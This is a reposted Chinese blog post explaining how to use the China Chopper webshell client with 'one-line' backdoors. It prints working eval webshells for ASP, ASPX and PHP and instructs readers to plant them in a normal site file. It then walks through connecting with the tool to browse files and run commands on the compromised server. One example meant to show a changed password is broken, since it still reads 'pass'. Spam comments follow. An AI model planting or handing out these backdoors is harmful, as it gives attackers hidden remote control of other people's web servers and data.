当前位置:首页 > 随笔 > 正文内容

一句话与中国菜刀的用法

光的传人14年前 (2012-11-15)随笔9913

 注:本文转载,仅用来个人学习。

菜刀是用来连一句话的,asp、aspx、php的一句话菜刀都可以连,只是这几种一句话语句不一样。
asp的一句话是:<%eval request(“pass”)%>
aspx的一句话是:<%@ Page Language=”Jscript”%><%eval(Request.Item["pass"],”unsafe”);%>
php的一句话是:<?php @eval($_POST['pass']);?>
这几个一句话的密码都是pass,也就是双引号或者单引号包含着的这部分,比如我想把asp的一句话的密码改成drvfan,那么改完之后就是这样的:
<%eval request(“pass”)%>
其他同理。
要想连一句话,你首先得把这个一句话插入到一个正常的网站文件中,asp的一句话插入到asp文件里,aspx的一句话插入到aspx文件里,php同理。
当然,你也可以把一句话单独写在一个文件里,比如你新建了一个asp.php文件,这个asp.php文件的全部内容就只有一个一句话,也是可以的。
插入了一句话木马,下面就是连接了。
在菜刀主界面,右击,选择“添加”,
在“地址”这里填上你插入一句话的文件的地址,后边的那个小框填的是你的一句话的密码,其他的可以不用填,
填完之后单击“添加”,就可以了。
添加完毕后,你的这个一句话的shell会显示到菜刀主界面里,鼠标右击它,选择“文件管理”,就可以看到网站上的文件了
所以,使用菜刀,一定要熟练运用一句话
asp的一句话是:<%eval request(“pass”)%>
aspx的一句话是:<%@ Page Language=”Jscript”%><%eval(Request.Item["pass"],”unsafe”);%>
php的一句话是:<?php @eval($_POST['pass']);?>
在菜刀工具里还有一个功能,是“虚拟终端”,也是在右键菜单里的,这个相当于webshell中的执行DOS命令的功能
如果你的shell有权执行DOS命令,那么直接输入命令回车就可以看到结果了

扫描二维码推送至手机访问。

版权声明:本文由光的传人博客www.liu16.com发布,如需转载请注明出处。

本文链接:http://www.liu16.com/post/maicaidao.html

标签: 黑客
分享给朋友:

相关文章

写代码也可以比着葫芦画瓢!

写代码也可以比着葫芦画瓢!

研究了一晚上asp代码,终于把老师交给我的任务搞定了!修修改改,参考参考,再修改,出错再修改,比着葫芦画瓢一晚上时间终于靠自己钻研写出一段代码实现了某种功能——对asp调用数据库的语言只是面熟,语法根本不懂!在此庆贺...

新冠肺炎:央视采访武汉市长被删减的片段?别TM搞笑了

新冠肺炎:央视采访武汉市长被删减的片段?别TM搞笑了

在家闲来无事,想看看外媒是怎么看待中国这次武汉新冠肺炎的。facebook不注册不能搜索,推特可以。于是就搜索关键词“武汉”,看看有啥有用的信息。结果,搜出来的大部分是断章取义、扭曲事实的一些内容,怪不得在国内会被屏蔽。尤其是这么一个视频,...

美得令人窒息的唐诗,鉴赏及下载

美得令人窒息的唐诗,鉴赏及下载

本来,“美得令人窒息的唐诗”是形容唐诗的美妙,却不曾想被人用来直接当作了书名!书中从唐诗三百首中精选了一部分,就成了《美得令人窒息的唐诗》一书。虽然这本书对所选的唐诗进行了注讲、解释,但是我还是觉得原汁原味的唐诗美得让人窒息!古话说的好:熟...

声明:原创文章请注明转载自光的传人

声明:原创文章请注明转载自光的传人

本来想写一篇关于星期天给朋友装机的事件,但是刚刚在浏览网页时,发现我今天下午在站长之家投稿审核通过的文章被人转载或者采集!这本来是一件好事,自己原创的文章能够得到大家的认可,并且人家愿意转载,说明自己写的还算可以!可是,就有懒人在转载的时候...

本文测试微信是否屏蔽天猫链接

本文测试微信是否屏蔽天猫链接

本文测试微信是否屏蔽天猫链接,仅供测试!点击此处进入天猫地址。用微信访问本页面,然后再点击本页面上天猫链接,是否会出现屏蔽?测试一下就知道了!结果还是屏蔽的!显示如下:阿里巴巴屏蔽了来自微信的浏览请求如需浏览,请长按网址复制后使用浏览器访问...

Z-blog为什么会起这样一个名字?

Z-blog为什么会起这样一个名字?

任何一个名字都是有他的意义的。刚开始接触Z-blog的时候,真不明白为什么起这样一个名字,中间还要加个杠。现在明白了,因为Z-blog的原创作者叫朱烜,取姓的第一个字母“Z”,这个CMS是专门为博客而生,于是就有了这样一个简单却不凡的名字:...

评论列表

空气源
13年前 (2013-04-07)

php的不懂呀!路过支持一下呗

健康使者
14年前 (2012-12-20)

学习了

女装报告
14年前 (2012-12-11)

这是要教我们啥呀?

智能电网
14年前 (2012-12-06)

鸭梨山大,楼主这篇藐似没看懂

长安婚纱摄影
14年前 (2012-11-30)

鸭梨,太有才了!

南阳金巴黎婚纱摄影
14年前 (2012-11-24)

好,顶

奶茶
14年前 (2012-11-22)

菜刀不但是用来切菜还可以做其他很多东西。。。

wordpress博客主机
14年前 (2012-11-21)

学习了

霍致永博客
14年前 (2012-11-20)

这个标题太震撼啦哈哈欢迎来访

快播电影
14年前 (2012-11-20)

看不懂 PHP了,吐血了

李志红博客
14年前 (2012-11-19)

不是很懂,只来看看。

男装
14年前 (2012-11-19)

看了半天,因为不懂,所以还是没有看懂

比分直播
14年前 (2012-11-16)

来学习了,谢谢分享

润初颜
14年前 (2012-11-16)

php的不懂呀!路过支持一下

发表评论

访客

看不清,换一张

◎欢迎参与讨论,请在这里发表您的看法和观点。